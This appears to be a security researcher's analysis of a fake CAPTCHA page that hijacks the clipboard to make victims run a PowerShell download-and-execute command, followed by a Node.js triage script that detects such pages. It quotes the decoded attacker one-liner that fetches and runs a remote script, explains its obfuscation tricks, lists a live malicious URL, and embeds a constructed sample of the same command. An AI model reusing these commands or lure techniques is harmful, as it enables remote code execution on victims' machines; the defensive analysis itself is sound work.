Fake CAPTCHA Websites: Clipboard Hijacking and Malware Delivery

Background

Fake CAPTCHA pages are a growing phishing and malware delivery technique. Attackers spin up webpages that mimic familiar CAPTCHA checks (Google reCAPTCHA, Cloudflare Turnstile, etc.) to convince users they must “verify” they are human. Instead of providing an actual challenge, these pages may:

  • Display a fake verification prompt.
  • Trick users into copying and running a malicious command.
  • Silently redirect to phishing logins or malware downloads.

Many such pages are hosted on legitimate cloud platforms (e.g., Cloudflare R2). The trusted hosting and easy deployment make them attractive to attackers. After a victim follows instructions, the delivered code often fetches additional payloads (stealers, RATs, etc.) and compromises the system.

Discovery Details

  • Date & Time (UTC): 6 September 2025, 03:25
  • Discovery Method: The suspicious page appeared after navigating through external links on a streaming site. It presented a Google-like CAPTCHA verification request, which raised suspicion and led to further analysis.
  • Source Website (where encountered): hxxps://www[.]fushaar[.]com/ (searching for “The Imitation Game”)
  • Malicious URL (defanged): hxxps://pub-21433263b3ab4c129afeecdecfd2e39c[.]r2[.]dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html
  • Live sample (do not visit), kept as plain text rather than a hyperlink:
    https://pub-21433263b3ab4c129afeecdecfd2e39c.r2.dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html
  • Wayback Machine snapshot (if the live page has been taken down):
    https://web.archive.org/web/20250905184801/https://pub-21433263b3ab4c129afeecdecfd2e39c.r2.dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html

Technical Analysis

Fake CAPTCHA verification prompt
Screenshot: Fake CAPTCHA page prompting a verification action.

Clipboard Hijacking

Without the victim ever pressing Ctrl+C, the page primed the clipboard with a command. The relevant function observed in the source was:

  function copyToClipboard() {
    navigator.clipboard.writeText(
      "powershell -w mini [Uri]::UnescapeDataString('%77%67%65%74...')|powershell"
    );
  }

In pages of this kind the function is bound to the click on the fake "I'm not a robot" checkbox, because navigator.clipboard.writeText() only succeeds during a user gesture (transient activation); the fake checkbox exists to supply that gesture. The command is percent-encoded ("%77%67%65%74" decodes to "wget") so that neither the victim glancing at the clipboard nor a naive string match sees the real command.

When the user follows the on-page instructions (Win+R, Ctrl+V, Enter), the staged command runs from the Run dialog: the first powershell.exe instance decodes the percent-encoded string with [Uri]::UnescapeDataString and pipes the plaintext into a second powershell.exe, which reads it from standard input and executes it. -w mini abbreviates -WindowStyle Minimized, so little is shown on screen. The attacker gets code execution that fetches and runs a remote script without the victim explicitly copying anything or downloading a file.

Malware Payload

Two views of the page are worth comparing: (1) the live DOM and inline JavaScript as shown in the browser's Inspect panel, and (2) the raw page source (Ctrl+U). The two can differ when scripts rewrite the page after load, so reviewing both helps establish capabilities and the execution chain.

Quick decode: Running the percent-encoded argument of [Uri]::UnescapeDataString through a URL decoder (for example, urldecoder.org, or decodeURIComponent() in a browser console) yields a PowerShell one-liner that downloads a remote script and runs it in memory:

  wget -UseBasicParsing hxxps://diravo[.]com/dls.txt | i`ex

Read it as follows: wget is the Windows PowerShell alias for Invoke-WebRequest; -UseBasicParsing skips the Internet Explorer HTML parser so the request works even where IE's first-run setup is incomplete; and i`ex is iex, the alias for Invoke-Expression, with a backtick inserted to break naive string matching (the backtick is PowerShell's escape character and is discarded before the name is resolved). The fetched text (dls.txt) is executed directly, so nothing is written to disk at this stage. Do not run this.
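As an added example (not code from the analysed page), the following Node.js script turns the clipboard-priming check and the quick-decode step above into a static triage routine: it pulls every string handed to navigator.clipboard.writeText() out of saved HTML, percent-decodes the [Uri]::UnescapeDataString argument, strips the backtick obfuscation and expands the Windows PowerShell aliases, then flags download-and-execute behaviour. The sample page, the function names and the example.invalid URL are constructed for this example; the real second-stage host from the page is not used.

```javascript
// Added example for this write-up, not code from the analysed page: a small
// Node.js triage helper that finds clipboard-priming JavaScript in saved HTML,
// percent-decodes the staged command and expands the obfuscated cmdlet names.
// Function names, the sample page and the example.invalid URL are assumptions.

// Encode every character as %XX, as the observed payload does ("%77%67%65%74"
// is "wget"). Used here only to build the constructed sample page.
function percentEncodeAll(s) {
  return Array.from(s, (ch) =>
    "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")
  ).join("");
}

// Constructed stand-in for the staged command. example.invalid is a
// placeholder, not the real second-stage host.
const STAGED_COMMAND = "wget -UseBasicParsing https://example.invalid/dls.txt | i`ex";

// Constructed sample page with the structure of a fake CAPTCHA page: a fake
// checkbox bound to a click handler, Run-dialog instructions, and the
// percent-encoded command handed to navigator.clipboard.writeText().
const SAMPLE_HTML = `<html><body>
<div id="checkbox" onclick="copyToClipboard()">I'm not a robot</div>
<ol><li>Press Win+R</li><li>Press Ctrl+V</li><li>Press Enter</li></ol>
<script>
function copyToClipboard() {
  navigator.clipboard.writeText("powershell -w mini [Uri]::UnescapeDataString('${percentEncodeAll(STAGED_COMMAND)}')|powershell");
}
</script></body></html>`;

// 1. Every string literal passed to navigator.clipboard.writeText().
//    Handles both quote styles and backslash escapes inside the literal.
function findClipboardWrites(html) {
  const re = /navigator\.clipboard\.writeText\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  const writes = [];
  let m;
  while ((m = re.exec(html)) !== null) writes.push(m[2]);
  return writes;
}

// Aliases as defined in Windows PowerShell 5.1, which is what the Run dialog's
// powershell.exe launches (curl/wget are not aliases in PowerShell 7).
const ALIASES = {
  wget: "Invoke-WebRequest", iwr: "Invoke-WebRequest", curl: "Invoke-WebRequest",
  irm: "Invoke-RestMethod", iex: "Invoke-Expression", saps: "Start-Process",
};

function percentDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    // Malformed sequences (e.g. a lone %): decode byte-wise instead of failing.
    return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  }
}

// 2. Decode one clipboard payload: percent-decode the UnescapeDataString
//    argument (or the whole text if that call is absent), drop obfuscating
//    backticks, expand aliases, and pull out URLs and behaviour indicators.
function decodeStagedCommand(raw) {
  const m = /UnescapeDataString\(\s*(['"])(.*?)\1\s*\)/i.exec(raw);
  const decoded = percentDecode(m ? m[2] : raw);
  // A backtick before a character that is not a real PowerShell escape
  // (n t r 0 a b f v) is a no-op inserted to defeat string matching: i`ex -> iex.
  const unescaped = decoded.replace(/`(?=[^ntr0abfv\s])/g, "");
  const normalized = unescaped.replace(/\b[a-z]+\b/gi, (w) => ALIASES[w.toLowerCase()] || w);
  const urls = unescaped.match(/https?:\/\/[^\s'"|;)]+/gi) || [];
  const lower = normalized.toLowerCase();
  const indicators = [];
  if (/\bpowershell\b/i.test(raw)) indicators.push("powershell-launcher");
  if (/UnescapeDataString|FromBase64String/i.test(raw)) indicators.push("encoded-stage");
  if (/invoke-webrequest|invoke-restmethod|downloadstring|downloadfile/.test(lower)) indicators.push("remote-fetch");
  if (/invoke-expression|\bmshta\b|\bcmd\b/.test(lower)) indicators.push("code-execution");
  if (indicators.includes("remote-fetch") && indicators.includes("code-execution")) indicators.push("download-and-execute");
  return { raw, decoded, normalized, urls, indicators };
}

// 3. Whole-page verdict. Run-dialog instructions alone are only "suspicious":
//    a page that assembles the command at runtime will not match the regex.
function triagePage(html) {
  const clipboardWrites = findClipboardWrites(html);
  const findings = clipboardWrites.map(decodeStagedCommand);
  const usesExecCommandCopy = /execCommand\(\s*["']copy["']\s*\)/i.test(html);
  const runDialogInstructions = /win\s*\+\s*r\b|ctrl\s*\+\s*v\b/i.test(html);
  let verdict = "clean";
  if (findings.some((f) => f.indicators.includes("powershell-launcher") || f.indicators.includes("download-and-execute"))) {
    verdict = "malicious";
  } else if (clipboardWrites.length > 0 || usesExecCommandCopy || runDialogInstructions) {
    verdict = "suspicious";
  }
  return { clipboardWrites, findings, usesExecCommandCopy, runDialogInstructions, verdict };
}

console.log(JSON.stringify(triagePage(SAMPLE_HTML), null, 2));
```

To use it on a real page, fetch the HTML with a non-browser client (for example curl -o page.html, so nothing executes) and pass the file contents to triagePage() in place of SAMPLE_HTML. The extraction is deliberately regex-based and will miss commands built from fragments at runtime or loaded from an external script; those pages still surface as "suspicious" through the Run-dialog instructions, which is the cue to inspect them in a sandboxed browser.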

Browser Inspect view showing inline JavaScript on the fake CAPTCHA page
Inspect (DevTools): inline JavaScript related to clipboard priming.
Page Source view highlighting the malicious script in the HTML
Page Source (Ctrl+U): embedded script revealing the payload path.

Note: At the time of writing, ANY.RUN did not flag this sample as malicious. Detections can change over time.

Safety: Never execute commands from untrusted web pages. If prompted to paste/run a command, close the page and investigate.

Next: In a follow-up, I’ll reveal the embedded code, show the deobfuscation steps, and map the full payload chain with IoCs.
